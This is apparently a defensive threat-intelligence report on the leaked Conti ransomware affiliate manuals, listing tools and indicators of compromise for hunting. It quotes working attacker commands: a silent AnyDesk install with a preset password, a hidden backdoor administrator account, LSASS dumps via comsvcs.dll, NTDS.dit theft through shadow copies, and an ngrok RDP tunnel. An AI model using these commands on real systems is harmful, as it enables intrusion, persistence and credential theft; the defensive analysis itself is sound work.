Believed active since mid-2020, Conti is a big game hunter ransomware threat operated by a threat group identified as Wizard Spider and offer to affiliates as a ransomware-as-a-service (RaaS) offering.
Following the lead of other big game hunter ransomware groups, Conti adopted the double extortion tactic, also known as ‘steal, encrypt and leak’, in order to apply additional pressure on victims to pay their ransom demands and avoid sensitive or confidential data being exposed.
Infamously responsible for a large-scale ransomware attack on the Irish Health Service Executive (HSE), a disgruntled Conti affiliate leaked an archive containing internal ‘manuals and software’, as utilized by the group, on August 5, 2021 to a popular Russian-language cybercrime forum (Figure 1/Figure 2).
Figure 1 – Forum post detailing the Conti leak
Figure 2 – Google Translation (Russian to English)
Seemingly upset at not receiving a cut of the profits, this leaked archive provides an insight into the tools, techniques and procedures (TTP) of the group and their affiliates, likely similar to TTP utilized by other ransomware threat groups.
Later posts to this forum thread suggest that some attack tools were excluded from this leak including a Mimikatz payload, used to evade antivirus solutions, and a ‘stealer’ payload, used to acquire credentials from browsers.
Additionally, the affiliate claims to hold information pertaining to the development of targets and a list of ‘teams’ although it is not clear if this list would expose high-ranking members of the Conti/Wizard Spider threat group.
Having reviewed this leak archive, the content appears authentic and, as such, the TTP are likely to be in current use by Conti as well as potentially other ransomware groups using similar methods.
This report provides a summary of indicators of compromise (IOC) identified from this analysis to allow defenders an opportunity to hunt for these threats within their organization’s network as well as proactively block or identify future intrusion attempts.
Payloads & Tools
Whilst some of the tools utilized by Conti are ‘legitimate’ commercial or open-source offerings, their unexpected presence and/or execution on an organization’s network may be indicative of nefarious use and should be investigated.
AdFind  is a free Active Directory (AD) query tool used to gather information such as hosts and users, likely during the threat actor’s reconnaissance phase, from the target network.
Aside from identifying additional hosts to target, the threat actor will attempt to determine high-value users from the information acquired using AdFind.
Specifically, documentation within the leak reveals that Conti defines users as being either ‘Junior’, ‘Medium’ or ‘Senior’ with the group obviously seeking to identify high privilege ‘Senior’ accounts with higher privileges. Furthermore, suggested departments of interest include those mentioning ‘Administration’, ‘IT’ and/or ‘LAN Engineering’.
In addition to the use of AdFind, which does not necessarily require administrative privileges to execute, the group will also use native commands such as:
NET GROUP "DOMAIN ADMINS" / DOMAIN
Notably, execution of the
backup.bat script results in the following text files, containing AD information from a victim network, being created:
Additional scripts are also included within the leak with
script.sh seemingly being used to parse AdFind results:
The output of this additional script includes the following text files:
Whilst a script named
p.bat may be used to ‘ping’ discovered hosts to determine if they are online:
Notably this script will read the content of
domains.txt and output results to
Antivirus Removal Tools
Albeit contained within a password-protected 7zip archive, a number of executables and scripts are seemingly provided to remove endpoint security solutions:
- Bitdefender 2019 Editions 
- Trend Micro 
trendmicro pass AV remove.bat
- Sophos 
Additionally, this archive includes rootkit removal tools, potentially used to prevent third-party rootkits from impacting the group’s activity:
- GMER Rootkit Detector and Remover 
- Epoolsoft PC Hunter
- PowerTool Antivirus & Rootkit Tool 
Whilst specific file hashes for the above files cannot be determined from the encrypted archive, those deploying the tools may drop the entire archive onto a target host:
3 # AV.7z
Cobalt Strike , is a legitimate commercial tool often used by red teams to provide a post-exploitation implant, named ‘Beacon’.
Typically delivered and reflectively loaded into the memory of an injected Windows process following the exploitation of some vulnerability, Cobalt Strike evades detection and provides numerous capabilities to a threat actor including command execution, file transfer, keylogging, Mimikatz credential gathering, port scanning, privilege escalation and SOCKS proxying.
Command and control (C2) communications utilize common protocols, including HTTP, HTTPS and DNS, likely to avoid anomaly detection by appearing alongside other legitimate network communications and, once deployed, the Beacon will attempt to periodically call home to a preconfigured C2 server.
The main Cobalt Strike archive includes the following files, many of which may also identify the presence of earlier versions of Cobalt Strike:
Additionally, a Cobalt Strike script used to query the Windows Registry for signs of antivirus software being installed may also be deployed:
C2 IP Addresses
Based on screenshots shared by the rogue affiliate, the following IP addresses were potentially previously used as Cobalt Strike command and control (C2) infrastructure:
Kerberoast  is a Kerberos attack technique that allows an unprivileged user to gain access to service accounts by cracking NTLM hashes acquired from ticket-granting tickets (TGT) in memory. Brute-forcing these HTLM hashes can allow a plaintext password to be determined leading to privilege escalation.
In this instance, a PowerShell script from the Empire Project  has been deployed for ‘Kerberoasting’.
Proxifier  is a commercial tool that allows non-proxy aware applications to proxy their network traffic through a SOCKS or HTTPS proxy.
Rclone  is a legitimate open source tool used to synchronize and manage data on local, cloud and virtual file systems, seemingly used by the group for data exfiltration via the Mega.nz cloud storage platform.
Instructions provided to the affiliate detail how to copy data from victim hosts to a Mega cloud storage account and detail the use of a PowerShell script to process multiple network shares.
Launching the PowerShell script
rclonemanager.ps1, a list of network shares is read from a file named
2load.txt and used with Rclone which is executed in multi-threading mode. Additionally, the configuration file
rclone.conf contains credentials for a threat actor controlled Mega account into which the data is uploaded.
Router Scan by Stas’M  is a network audit tool used to identify devices and, using various exploits, gather data from network infrastructure devices.
Given the use of exploits, endpoint security solutions will likely identify this tool as malicious.
In addition to the identified binaries, ‘manuals’ within this leak identify the use of numerous native Windows and third-party tools. As such, the unexpected execution of the following commands may be indicative of nefarious activity.
Presumably acting as an additional method of remote access, a manual within the leak suggests the use of the commercial remote access tool AnyDesk  to allow the threat actor to browse the file system of victim hosts as well as potentially delivering additional payloads and/or exfiltrating data.
To simplify the use of AnyDesk, an example PowerShell script is provided that downloads the AnyDesk executable to
C:ProgramDataAnyDesk (Figure 3).
Figure 3 – Example PowerShell script used to download AnyDesk
Once downloaded, AnyDesk is then silently installed and an access password configured:
cmd.exe /c C:ProgramDataAnyDesk.exe --install C:ProgramDataAnyDesk --start-with-win --silent
cmd.exe /c echo J9kzQ2Y0qO | C:ProgramDataanydesk.exe --set-password
As observed in the group’s Remote Desktop configuration, an additional administrator account may also be configured, albeit likely using different values, along with hiding this account from the login screen by creating or modifying the
net user oldadministrator "qc69t4B#Z0kE3" /add
net localgroup Administrators oldadministrator /ADD
reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserlist" /v oldadministrator /t REG_DWORD /d 0 /f
Finally, AnyDesk is executed with the
--get-id parameter that is required by the threat actor to gain remote access:
cmd.exe /c C:ProgramDataAnyDesk.exe --get-id
Conti Encryption Tool
Whilst the actual encryption tool is not included within the leak, documentation for the Linux version, potentially named
encryptor, provides details of the tool’s options including VMware ESXi capabilities:
- Encrypts files on the specified path. There will be no mandatory parameter without it.
- Kills all processes that interfere with file open operations.
- Logs all activity including errors.
- Turns off all VMware ESXi virtual machines.
- Used with the
--vmkilleroption, specifies VMware EXSi virtual machines that will not be turned off.
- Used with the
- Detaches the encryption process from the current terminal session so that it continues to run should the session fail.
As detailed in the rogue affiliate’s forum post, the Mimikatz attack tool was excluded from this leak although details of the group’s credential dumping methods are within the leaked manuals.
Specifically, the following commands are given as methods for creating a memory dump of the Local Security Authority Subsystem Service (LSASS) for later analysis and credential theft:
rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump PID C:ProgramDatalsass.dmp full
wmic /node:[target] process call create "cmd /c rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump PID C:ProgramDatalsass.dmp full"
remote-exec psexec [target] cmd /c rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump PID C:ProgramDatalsass.dmp full
Whilst not present within this leak, SoftPerfect Network Scanner  is a commercial network administration tool available for both macOS and Windows.
Based on the manuals within this leak, this tool is used to gather information on hosts within a target network:
netscan.exe /hide /auto:"result.xml" /config:netscan.xml /range:192.168.0.1-192.168.1.255
It is likely that this tool would be deployed in its ‘portable’ format, rather than installed, along with the above specified XML files. As such, the following files may be present:
Widely used by developers, ngrok  is a legitimate service that allows the creation of a secure tunnels that provide remote access to hosts within private networks, such as those behind firewalls and/or Network Address Translation (NAT).
Assuming the ‘free plan’ is used, execution of ngrok on a target host results in a randomly generated temporary
ngrok.io address being created to allow remote access via a secure HTTP/TCP tunnel.
Aside from nefarious use by threat actors, unauthorized tunnels should be discouraged given that they can bypass security controls and increase the attack surface of the organization.
In this instance, ngrok is used by the threat actor to simplify access to Remote Desktop services on Windows hosts, as determined by TCP port 3389, although in practice these parameters may vary:
ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg
ngrok tcp 3389
The NT Directory Services Directory Information Tree file, located in
%WINDOWS%NTDS.dit, acts as a database for Active Directory and contains valuable data including credentials.
As such, threat actors seeking to elevate their privileges within a network will attempt to acquire this file, although it is locked by default.
To work around this issue, Conti detail the use of the Windows Management Interface command-line utility (WMIC) and the Volume Shadow Service (VSS) administrative tool to create a Volume Shadow Copy of the system:
wmic /node:"DC01" /user:"DOMAINadmin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows >> c:log.txt"
net start Volume Shadow Copy
wmic /node:"DC01" /user:"DOMAINadmin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
Having created the shadow copy, the NTDS file and potentially sensitive Windows Registry hive files, can be copied to another location for exfiltration:
wmic /node:"DC01" /user:"DOMAINadmin" /password:"cleartextpass" process call create "cmd /c copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy55WindowsNTDSNTDS.dit c:templog & copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy55WindowsSystem32configSYSTEM c:templog & copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy55WindowsSystem32configSECURITY c:templog"